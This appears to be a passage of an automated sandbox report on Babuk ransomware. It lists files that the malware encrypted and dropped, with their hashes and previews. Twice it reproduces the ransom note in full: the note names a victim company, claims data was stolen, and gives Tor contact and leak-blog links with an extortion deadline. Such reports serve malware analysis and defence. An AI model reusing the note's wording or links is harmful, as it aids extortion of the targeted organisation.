                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1944
                                                                            Entropy (8bit):7.890917388051763
                                                                            Encrypted:false
                                                                            SSDEEP:48:GJ9AVfM47PAcSb4j5lAMnzTSLrj6sKfQReo3Sx11:Gg3oJbuMMn/Qjr4DJX1
                                                                            MD5:5C60B6DC2FB9EE857050EBE52894DB85
                                                                            SHA1:8C80CAB6C979F2F178BCDE332D1AE15F91AA783A
                                                                            SHA-256:9C39847DC2DE1CF0C759F0EA17D9CD56D9B55C985CBAFA180F413303D1931197
                                                                            SHA-512:369733B99DD765396943C53E091C7AB4BE223CF1F88E7CB98B0AF6255738734F0F27F0480F78088B0A5F66855A1C4000EF44EDFC3E03CE1D8DA1555B57C451AF
                                                                            Malicious:false
                                                                            Preview: ......w..F...+.{2u.....48.FoB....c.i.1(*.g.......Kee...z......lF..q.L/.-.c.J..,....9.~.-..U.9.E........^....?J9.O"kdR....B...{>;.{......a.9.u..H$..t. ....;.{..{\.....I.h.o.....I....1.R.C...F.U_.'EtX{........w..6.Sou.9}..R...W....R.q.B........V...F.."...`.......<av.S.sxu.....i|N....Q..B^2f.IQe>...%..g.K.a.}e..dW..f.3.>....,%.....v!..}.[.O.BBk.Z.(..e.#.t.D g..1.\y........S:l?...]....I.L1.a./.4.1....T.....sxWt.?........O{.:{......}e2.\.za.......!...1-..gk[WDx.v'|A....;Q-.P..iL.WNA....2.....3...gBh4g.)....B.........&^........"b{.#.y..7$f......O...Z..^..:]...U6..R..p.K....-..As..........8.x.L.l.bc'SVN..6.-&...Q.b...%lk.N.y=..xt.3.S.Y...y....{u.9.....O.1'7....H....p.. .......p..Z7N.M.O.9..."Axt...Z..K/.oX...B.......E<....&.*.yX...y..........N...x.*..S...2...y....K|.9w.6vG.(.......W...............T..`c.+.x......}!+.\....m$%.C.M......`...`@....sVG.j...u.....C.Ql!....H...Y5Fhc.n.K......6...O...X..IS6_..p..PJ`..f[,.@..{k.y...sw.95.9...jvE.H......TP
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-100.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):581
                                                                            Entropy (8bit):7.654395297777812
                                                                            Encrypted:false
                                                                            SSDEEP:12:gnYT9mZ291DS9yYOxsQM9Z7rywau9x1D/xRJ9hL/as:4YTk21e9yjQb7r+u9xjRJx
                                                                            MD5:F32891AECAE4304233D97F567F30BA65
                                                                            SHA1:705703B0F11F3366358C8DF45844DB445A696D91
                                                                            SHA-256:AA02AD1E100482517C7362F621AD5A4CEEDF32AB414E436AFBB3B6193C8B9DCB
                                                                            SHA-512:B1D4423CF713B0CC8C9E1CDEDE3509F3C312C3C7903937D86F384BCB2BEEAD0A46AE85354F19CA0535175E4FCB340F3E4B0A64163A86DCE212453614ADC63F5D
                                                                            Malicious:false
                                                                            Preview: $Q....l.z./=w3#6.T.}>.+< U...zi.c..,.....o9.............\....(..bs+....P...5-.?N...bb0z.....s.p^V..]%q.#.c.....(K1X..... .....:.....O9s.....%&..=..8K1.#..S.~fV..D..&...e.x..C...>J..:.`...U.._..A/...%.5.....l..c...j..V.b.p.....k.5..,.|...U..J.q.?G.O...}.t[8.2...LH.K...]u\9...x@.>#PB..vQ...".=.a..O.\.?....?.Lo.Y.Om.i5...v#T..G..Bh.....@J..;..T..S...^./kE.V>.l."n...Y.eR......u*f^.....m.m...:....|&U.e].&.z.......5...M|;...H.v.K&=....C7....#. s....Ptv...<VL..^.(..)....NU$.K.?*8. ...a..9..'.AIB...I.fw.e..e[.'..f..<..[....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-125.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):693
                                                                            Entropy (8bit):7.658825307403589
                                                                            Encrypted:false
                                                                            SSDEEP:12:hYy91oS9yRYrC+3Mtcqo/GHWmVMLyYrlMGPa2Z1gGKv45hyCCr0bZu:hYywgrC+3MmZG2mqT22Z1gHxCCQ9u
                                                                            MD5:EDDFDD992FCF69BD8DB1CB3C06A6BD40
                                                                            SHA1:107EBA5B9E118151C1D5B7D4C5127BCB8630C02D
                                                                            SHA-256:6BFE435A10D5F5918F7A20FD5135FB2CD5BF841A90ECE5F2AF081CFB768B3760
                                                                            SHA-512:60B09139DF2F0220E9003A31A1A32FD3708A7F4A3930149C712DDD30E3E877937481585421CD46647EEA10AA9752558B8E83EF766FF2F0685EB11B4B7B61C698
                                                                            Malicious:false
                                                                            Preview: R...`......+.Jyv....]..b..,!2.'b..5..lw..+.:..l*MI..5....g....h..7.3=..5.[v...E9j.....$go..Z;.F......`Z..C.lw..qK...4.e.vyL....%\+z.^X.p!|iXa.m.VP0q.s.-6.=.........P..@X......m...N..t.iU....)....*..fS'.z.]a....m.j..H....E.r.|..nX..8.6`....[.pq..U..}=.Px>.u...+...j...N).....o..sCU.9.,..e.}".t.(.v.PI.`R....4u...XD...~....}.X..-.....K.........;..r..C=...[mRvdRpLU...oo..FZ.$F.f3..?;2<...fK..c.aH._i^kh..B+."B.......7..m...N.Z".Xl....cA....K....!..q..-....+.1.z....5........\....;.6....EUp..R............/.UE.u.i.dd..V,.0..-|..o..x}=0uUZK.h.......Q..Kq..../fLDzc..t.....y.D~.C..9.i...D..J.!...............G..(tA*..%....!...O`.3....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-150.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):759
                                                                            Entropy (8bit):7.687678065894792
                                                                            Encrypted:false
                                                                            SSDEEP:12:kumlpNB/wiILuym8iUJtVlnrUB5jwhamvRe5yXiG0M0RpQUDPC/BIMw2Ig8KGMNL:zmlpNi7WQJP2B5WamZeIXr0VQIa5IR0V
                                                                            MD5:A6DA59E6AEE2834E1E9BBE6ABEAA430F
                                                                            SHA1:85DFF67E1423525B67E9833C7BF098B3553A1579
                                                                            SHA-256:02A9D13AE6E9CEC63494992EE88B0249B9063F1B3D23C50D9812F1348EF6A158
                                                                            SHA-512:EA914D73BBBA41AF82C2EC6D06162C064105141B87EC77DB62AA60EAD11053314C00C3FFA0E40B44357EA1074B0FF7B18E9DD5FAEB3FD27D88D1435FFB1FE564
                                                                            Malicious:false
                                                                            Preview: ..0..=.I..id"...oz.^..F...8..4.)...j....4...C..yj<ovvo...c.N.V..*r.)s..]....b.#f.B.....]..[\_9...$...O...I.#.+?$....m.DT$....DH..^.1..Q..8.?.v<w.d......Gv.n..'.+...i!....I.`w....v..N.d../fbJ;7..q2...1..-.5L.F..6...l..Sh.E..l.Q.q.a..f.....B.$'.i...{-Ys..."............8.r2.wSi!...I.....W;.X..#.G.mC.u~./..u.;.5.<.,5......Zf.b.(...z..%.....~.J.R..D.o..L...j5....C`..w.\p..bX..:y..|.H..._m3.q..*.4..L$t..9o......o..pCQ]....S.il.......l..[.\..a."...@. Z...o1.....i..u.../...@...X.Ju.cL.43..,...cX.9n..L....2y.T"..U.......y.3.q....N...#U$B.w6dl%..d@E.<.v.....&.....&.^.z....._wr..%.5...>..r..@&D\...o..$?..]x.....3..]...z.U......s.d.[;.{..24..6..<.L....1y...DU..`.D/Pc\....z.8$..i.t......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-200.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):971
                                                                            Entropy (8bit):7.815816221403926
                                                                            Encrypted:false
                                                                            SSDEEP:24:zxecjrvBWzlXUUoFZKWm7Bt9HLRGhz8Urcguff3+Wex:zxPrvBWzlHoFfmjlNwB4Fffn4
                                                                            MD5:97B16A5D9D96E3953B5BB144D28CC0BB
                                                                            SHA1:5D41883F407151ADAC8605B4F90950BBA0E077C3
                                                                            SHA-256:3F4FEE93757E5466FCF19D94B8F8292040AD251E5590FBF81F817D462F8912C5
                                                                            SHA-512:37103D4CD59CB6552A995C4BB531FD1C0FD486D0972F9C586AFF03AF7DBFF829C5DAB0F3EDBC7F260648D5C221259EC177948F71B53C8D0189C3B935615A80AE
                                                                            Malicious:false
                                                                            Preview: =...".i.;..g..Z.;....W..IW..mf..k....H.^-.Q...........P2..{..U-v....\.....)Yf....7f..Oq.f.~e.w......_I..f.[.N....CI.m..l.F...%.NL7...]..7...d.D.. ........%E....3c...*...W..v.].#....4m.....@.s.*.gH.z.]v.4~..;.g...y.j......iZ....*.=.d.Pv2.@....Ol..Y.8...bp.+..%B-.....E.P.n....q0...S..Z...9.`|...,.N&.c..s/..{...1g....(-...j5....Arp ./d.#.,.b.6....X-Kn..S.<..Y..e..r2q............&t^.%.INW...O...n.'//4a@G.;of.......Zp....^-.6.R...'.....H}.....I.....]".|.g.....7=.z..5.)...iE...|f'..E......y].....G@E.H....Jn.......>jy.....l.K....d...Q.y.nh_.s.r1.i6..|Q....f.\...$]r.i.z........_J.Us.z+&.d1%-2sN...q.V.4.>.6?LD.....bp..g!W..l..."k.e$...).b.j..a!.N.!.H...C.....).rM[..Y/.j....}m..S...!.!....i.C.,.....f....,D:....?..J&....#.+i.(.>6.L8...._......U..=.CP....`r.<E..8B.%gW.g}........$.....awOA*>.{.g.(.w......!..e.!.A>]QV..........d.!C...$<.h.......Y..K.....Lv!vP.._A.:.Q...8.. +...>....7I.Np.....FA.c.,..P....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-400.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1888
                                                                            Entropy (8bit):7.904359994957081
                                                                            Encrypted:false
                                                                            SSDEEP:48:b1hXyoX5yJA33MynXhy3Lwuas7+1PU8yD:bTXyoUicf3LwuQ1sJ
                                                                            MD5:CF008B578278C5238BF1216F86CE5525
                                                                            SHA1:D8D29E75275BC420DDE46AC587847D2EACB07841
                                                                            SHA-256:8D0AA06F72876F2EA24334C9EDD12804C57C982753ACA1495ED6D9A1C84CBF0F
                                                                            SHA-512:F7F63C7E722543BD4A663F77B24BE69A500C1E23282C93FAA5870B0632D0400E1184DBA2C9881973EFFEC8A8FB192BA29D46BB214443F98B497024DD5426861D
                                                                            Malicious:false
                                                                            Preview: {3..2zO..Yy.m..}4*+..e_.9I..n9..L.Bh....Y!.tK1..>,5.....C)#_....|J..m..)..l.P....L*t.V.X%f]........U..W.4O.?...X..w/'..:.<..M...h.+...\8Y...#Y<..uW......FQ+...^..:..n.~m...N..W...6.'..;B.~.:....d....^.(J.SX......RkN....N#\.5.;..p.I..bTZ.....Hj..Yz).0.c...O..v.J7 ....S.........G......a.q.q..x&.G.O(a|........;Q....Ng.q....O..eH.z.1...s..HY.&n'.F-l.x?..o*...Z..H. ....e...+.....T ..t..Ir..&aZ.R<N.....x.../.............Y..f..a........... ..!....UH...nV.:....bbp.2..R.xv.Ys.J|pJ...O.......n.<..;.....n...../q.#..D.(.E..#...XPl.B....X+8$.v.%u........?VH0..B.}.Ig.@.-5..2...vu...Q..LDi..\.m.$.G=..NP.^.V.^..m.a.]..A....W..."...2]...7......7...HJ...r@....O.>._*..I.{.$Ry.k.T.\.....U.t..$....0^.*".T...........|.....X....Meu.e.....+.@F.V(.&.T..t..F.|......E...v....T..r.....!..G\...(E.H.U..&..@b..a[6c..Jz..;...HC.5...r.y.z|.ws...:.....;....i@.....cQ.3a.!..`eI..0....d9Y.L.4@..(IXz>..+..a.I...pR.$......S.x....:.qeq.H.t...}kl?.f~hyL../.D.DO.....P?.
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.VisualElementsManifest.xml.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):512
                                                                            Entropy (8bit):7.476376058277544
                                                                            Encrypted:false
                                                                            SSDEEP:12:lEJYwswbcjDaa5rTwqEIQJyUr7FoCSKwsYtjC8b/e:lEJYwbvaxEIQJ5Vo2+t+8y
                                                                            MD5:15D4FCB7BD5D416152F9A8AFD821AD67
                                                                            SHA1:78D5BDFFBF93CD892359DBD1B4909DFDFDBDB488
                                                                            SHA-256:FAB4B017435AF010C72DD6392D2638C9A7A76454639F5232E5A3E866E321091F
                                                                            SHA-512:53B9D86FB8B7F79EB106BBE43787B014B8CDA25088F0EED0E9A7E808995FFEC02E771CCB3676C9E0F710E9E888B151B06D8C45B1965049D85F070E7BCCB9F428
                                                                            Malicious:false
                                                                            Preview: ..YE!_T.-!.+ZU..D....>...>.vXzX;..O|..'...:...b....@.:{...&bM.}..pZC..6.c}r..sA$".s.._*.T.....W.Atx...eB.P.v..A....v.u...F..&....H...QL.`.z.vG.....[G<..X.`...n..5....6B.3...#....|.v.!.........`.....u...tv<2..b..%.....1.(i..?...r...Z4...8.##M.Te0.=..(Or.l..+..(XR .........T..!.DS[c.=XL..1t.L....V.x.1.\E...mvM...h.|....yyUWHB.O..........lH.>..zCV....S...e.G..s.".;}.ei..S...t.k... .....ri;.>...G.VJ..t.l..........;..P.7.....D.C.;.....r(4..y.7.d..[.r...*.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\Resources.pri.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):4584
                                                                            Entropy (8bit):7.9622044639762635
                                                                            Encrypted:false
                                                                            SSDEEP:96:swOI5rlWDyxsAtL4vmLeClCA2wgZXwfkFuR35N/1rz2UIUR4qJ7:hnNlWD3M4vm9j7iKfR35hF23eJ7
                                                                            MD5:B861D1E493BDB37CB671802BC8400E7E
                                                                            SHA1:50186E5FDE14788A52CA169AA50E1D3BDE6C0E87
                                                                            SHA-256:56C7838F88ABA15177801A3F569027845D4DF70023B511E744F1A4F06B011403
                                                                            SHA-512:8E65D06DAE6B2C4079BCB42094D99D1C180C4BDCEFAAA6DCBE1A007DA3005B8455F06E0B94D2BA3077049905E976BB084F3533594EA506DCAD2032414073207A
                                                                            Malicious:false
                                                                            Preview: ..,XxH.E.26c2 ...`C.... .6. S......%e!.%....i..++__...:l.DA.......j5..A..*.Z.}..I9.L.UM......4.QN......x...].*..U...T...Pff...0p...|x...^..}..6bQ ......k.....N.]Q.F.. b@..p.K......L!....._F.hc.>T....Y:L..Rh..T.i.>..Cc4..B.M.[...U.H....]..?..o...7...U6=..R."e.".....'.<X(....h..3..Ns.EB.#=.&t.*.t...\J.X.k..K....JX...2S_?..$.L"SfI....4_..$....ttL.J.Y:.z8#5.rG...%..We .........8..%.g~.F.(+...FZ]t.{..y.H..Gz..._(.4?n..F..T?.[.?".<.+".Y.....X1.r>..z.'B...[.4.B8...F....H.K.@..%.c...9.uRQ..MR..g.jX.i..qT .bv..tcN......|..V\....k.}.~.M...G.....W&.w[.e...vg..... .'.4.Y...'..S...X;T....4.....Gd.o..w.kKh.s.,.5...)..K."r...s..........6.2.W.Z..#.+.......8A).?.)v.....6..g.......D....?B.D...s....D....UX;..#...e...........%.v;...y..T...H...x0....e.......ZI..A.> @...R(.....'..$2-.Nd.v..<.f>.**a....x.)...[...3{..V.R...7....W.SV~g.<.b...n..Ti..,^V...i..m....m.O.B....`(.y....@!...w....>.!.......}...)..).6.E.%..^so.$.pe$....."+.....J.AU.._..$.._f.`.I>../
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\ECSConfig.json.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):432
                                                                            Entropy (8bit):7.472753431689424
                                                                            Encrypted:false
                                                                            SSDEEP:12:JlPSKb4yWscyOVt1VsmCKnmgAVzWtro8PS:JlPfb4acyOVt1lnZmWho8PS
                                                                            MD5:D9D9A700BE90C88946E4BC5714C97E9A
                                                                            SHA1:E220BCD097A61B7CFD1F42904BBBA29CD83BD5C0
                                                                            SHA-256:99CA4482E2221BE4960134AD2041297060CB951A4F975423795CF0A38A6F8BB7
                                                                            SHA-512:9AB90715A2F6416C460DC48376FD18745809D335F68F214E878890E1F30376F0447CAD08CE147ED7CD065770EA4C8619939D11D2F3E330B0CA895936A85C21DA
                                                                            Malicious:false
                                                                            Preview: .S$?@.& ...Hm0.......$U.xDL.h...6q....B.8..!V..$X.Z5..yA...c...vI.....Jr...\.}...h.N..L..........|..OD...9.E.C.)%..o.c.....tR.wC......}..x0.........wQ.Ti.m0G}.....O.]...On|.4*.&Ud..q..\..V_...S .}....^.r...q^Dk..]...#+..j),....".....x0.Q...;..,...y........F1..d.VdV3.a.....T.f6b.\.GjU..N.?.F.E..s-~/~2;.B...KZ.;B...c...'2...S..MOs....u........4k5..9"..jP. ......fU.e...w...?9....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\DeviceHealthSummaryConfiguration.ini.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):245
                                                                            Entropy (8bit):7.052212212751961
                                                                            Encrypted:false
                                                                            SSDEEP:6:ojlmfAt8O0/XbMDZ19g5nn4rABSAQRtDmi5+0vtn:oj4fAqO0/Eu5n4rABS1RrR
                                                                            MD5:CCD351735E0FBF92EF17D3196CDA752F
                                                                            SHA1:27455104005813DA4D6D6D4FFD988379658087E0
                                                                            SHA-256:C5C8C5936D64043DAF7B05F5072A9AA7FF28BA76AB8EC464D135AFDD65F915F4
                                                                            SHA-512:7BFE351C569524D3578860CDF11E2731065FDD3AD75024750D9C01657ED490278F5C39504CA5EAD93DFEB5ED27DCDEEE735E793DF9A7229B585AFF286777DBB9
                                                                            Malicious:false
                                                                            Preview: .h..l....w.9.c/:f..._....~.i...v.*'t..N[..&{3.$....r.;..d.._..Z....M0.R.....}.s7"..l...I...9..@(.+P[.v..z.......n:s'.<.....WY.......}.G.P......x..SO.d..wV5.}i"....d.Y.#.?>p.!.F..?..<...b.Z.~b..F....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Downloader_2019-06-27_195650_1008-3040.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):15034
                                                                            Entropy (8bit):7.987947899597984
                                                                            Encrypted:false
                                                                            SSDEEP:192:fBi7fGHsKgHFsBFABbwyggyAckCJXOc6jrTRcV/5ZB2aTB6qbNRGZG2/Bxsr1pZn:Q7f2sLFsxSkXwOVhb2aTBvV25mr1XKo
                                                                            MD5:DC5406DE72A5DAB01255981FEC6B57BC
                                                                            SHA1:E94FC678B40ECE6D20F02E65E3802A10E5C406A2
                                                                            SHA-256:7A3E968D7D240498564E20BE0871DC59C9BE33F89222088BB2A47DC9D3539231
                                                                            SHA-512:9461D937243CB9580917827302A316131D576CE5FF3896A1B73527BC23E730638DD0BE2D3A226A9F4D5C9CC745693AC23B2E08087EC9342EEAA28619B7D66DC0
                                                                            Malicious:false
                                                                            Preview: .....j&e._(...........b.5..m...W....~7q..M<...q.B..u.Hz..H....x.{.p....c..T...H..a.....ZvP}.I7.......)t.%o(..d..M.....T.l.V...{.....<...%$#_..<..p{......Y.b.kf.....`..=.".-VCg.+.NH...a.zI.8.R..vLP.B..B.h..5c.V,.%..[..e,,dC.g.T-j`.4$....].....Y]...<(....%(w.%w9.D.33..&].z.`.C.....&.NH.M.e.....'..e./.....Ic.9o.%.:$.7.....@<.K..Tj...o.H......@D.=......S~_.V..lM....oj.....CJ...>....oP|.....mQ^.X-.h.XKp.\...-a6.T......ZT.h........2.,...j...\.n.......j_v.u......Gx.Q....[.9..2.dQ.M.U.~B.n!.......)^.e. )j#.o..]b.m..V ...F.u..............Y...)/.......J.cnN73-..@+..*......~...)`.T..\....u.....2.t..fg....S.\%e....&..A-.@..2....f..m...N.|p..Q.......#.3.".._...X...Bi.\.....&..c.W.]&....A..Z.X.......l7.khw[a`..v.x@kr./O.<.....Q t..]V.F".. .........#..o....\...(.f.-N...~DjA..3".#..Y..d.N.7..,....f.....$...v...X.\....z%.........Q.38.:......;'-p...L......3....pxQ......O...5..&.....H.M.....(....TB..eUs...=.i:..?M..G...F>.\.8e."...<f...}....9..(..]*...<.
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Downloader_2020-07-23_174109_5608-5612.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):36454
                                                                            Entropy (8bit):7.994570807031086
                                                                            Encrypted:true
                                                                            SSDEEP:768:WilNZGWvyLPHqvHik0/aVO1vY+L/4uqkqK/VbJyChJDBFQLPU:LZGnYz8aVO1hL/4tBiZn0LPU
                                                                            MD5:F76979B5A4B51FE7C3CDD8E1B3AE8F70
                                                                            SHA1:1E8833C1AA4694E2B24D3008E9C8D6CE976F77FD
                                                                            SHA-256:063A9ABC375B2EC7B98F931F94E59095183E6881684AC5DD887FBC3C3734DE23
                                                                            SHA-512:C11CF3F0B3B83DB9F77D4774EC9DB4CF5FDF7C0CACB4B84B7CAAEC2307C728C3EF9CBE0B1C51873AE4A0772EA119412E5CAFCA27AE07AAF8712DCA00EA3C6004
                                                                            Malicious:true
                                                                            Preview: ...0..K..cg)...*$..~'C.^Lo7....y............... 4...Jn...x3..!i.9.PZY.F*........}TTTY...,D..|u.}.......w.w.-i..2.E.|.S.09^O$......od}.r..D...p...K}........t..7b6..y~.oM.M."..a...*Y.....}=..q'...:...*.|.....:..~........./G......0e............:o.q..v?.z0Ed...{X.]`....T.Ta.@...@.w......<Gv.i...6`3.4.IE.rk=Z...[<.[..JY..b...x.Z.i. :.-.C...|.}.]r...D.#......a.GiW^.f.,...i[|..t..-r.N.U.jP...-...C.....V6B..@.VU...v9.b@...8E.-..W......b.K\..[.}.8w.z.yx...TA...."s...u.Y4 J...V....h.......oU@......,.C.<y.......-]....M...e...\..h-..cq-.YD]|.L..p...qSW`=..N].@?U=Ii{q...<..;.`.XF.Q.,Y..W.E.-0.]...O.....z.;zb.2..W.F.6Q.N.D.....%.T...'.......t....b.....F.2....8....z..M..v....%....{..J..\Yc.......@.g'.y.,.&!`#n0..@.". ..?/f.U6.5....:.]D.H...i.p.7........,f|.9..sU...-....84.>S5..p*f..7.k.{.UB...x>P_e.......t...w....k.AzJx.]z......{...(3....]....d.%O..S....*.+..Xd{.MX..Dt.%..?..XO.\6Fi.%.F..@.. ..5_.......4..#.AY.......l....-...n.e....&..1.
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Downloader_2020-07-27_144632_3336-1696.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):27688
                                                                            Entropy (8bit):7.993223223306985
                                                                            Encrypted:true
                                                                            SSDEEP:768:+E6Ubleqa6HRAgseXl+ovtz0M8jwpHUHywJjJWNp:+Evae1+m90yJUip
                                                                            MD5:B6FDC0378054DF3C7DC89FDC9B18F7FD
                                                                            SHA1:497369639D8B2D0CCC50A3E94284C6C816C648B4
                                                                            SHA-256:CB3C35279A27C8D466DD8FCD91970E54067E22249321902CC4C74F4FB664FD40
                                                                            SHA-512:7001CB37AF62466E1E3C433BEE35AB7DF6018C173F9220C76E261F476BC420757E77FF6F4F1FA9A8E69ACB957CAD21ACEB4ACF4E254B8FACFC2EBC4B99B066C0
                                                                            Malicious:true
                                                                            Preview: .........Sm.........z{.......E|......+w.....X..z....0G..0.o......D[F.oJ.X.....}.i.4..$....F.)..%.(..P.y..mXG.:...u..P...4...c....=F.....n .......R...s..p....R.p.J...r0........a...a......})...Q.Q..o..u..D.../v..v?.:E...R_..^.~....pO.?......_.'.$.4........e.....+3...BK4..[(..S.G..k.(...5Xl...&=...._.A.PW...#.A1t..z&...G.....(d..*t...V..@L....I.(..B.NLl ..(({..:...a3.eL._.w.v&....v3..'....x..J.~5.....u..U..5.}....X..7...6.e|.j. ...M..&r<7_..g...c9$....X6.....O.X...P..7.2...Ve.r.aK.>J/..m.., =m.9o.9.t....>.......#.2(9-.A.U.}%..."b....l.......f..).J\'k....G.=.1.....7A1c.s.v.M...Q.S*y..Y=.....$..y.k..;.uLf{;....bN....=w.....\...g .....;+.H.....BNM&..^?Z...=*.1..?..>..3>.9[....d.+).+7..+..0M.0.......z.._....\y..;..........Xr.....I...%>W..]X_.*.#F!..Z.........u(......wm.7]C.g./g..W'..A4``....i..8...K.."?49D...af.a.2.@....3..n..K.4..y....H.W.c..a...mx.%...v>............O.d.p.....q.......%.8s:...-^...D.J....#p.^F...o..9..U...GJ..o...2[__n.
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2019-06-27.1954.6516.1.aodl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):5952
                                                                            Entropy (8bit):7.972660854219623
                                                                            Encrypted:false
                                                                            SSDEEP:96:KikrHBX83UOCsd2IFlDlqKTAfas5c055l0DmsKn1urqEF/G5ufEOlm+6KABguhhx:cV83OssI75BTAfd5c055aDmHnYV/G5uI
                                                                            MD5:7A7A2A9756370B6703060108A352065A
                                                                            SHA1:27105A2188EBFE6294F9DDA102E9852883D7C908
                                                                            SHA-256:2B9B4A52007682ABB38E08FC2EFD1483956CD0CCA934F74A1BC70AC7DED5EE28
                                                                            SHA-512:4DA0ABAA7F1AED5914302142D028FF0C0BE0B77E7C2CE36C97C9F670C350349F795D826FF16FD65A06D9372052F230A9434C6C2D7BC38C0AB0286ED77E15678F
                                                                            Malicious:false
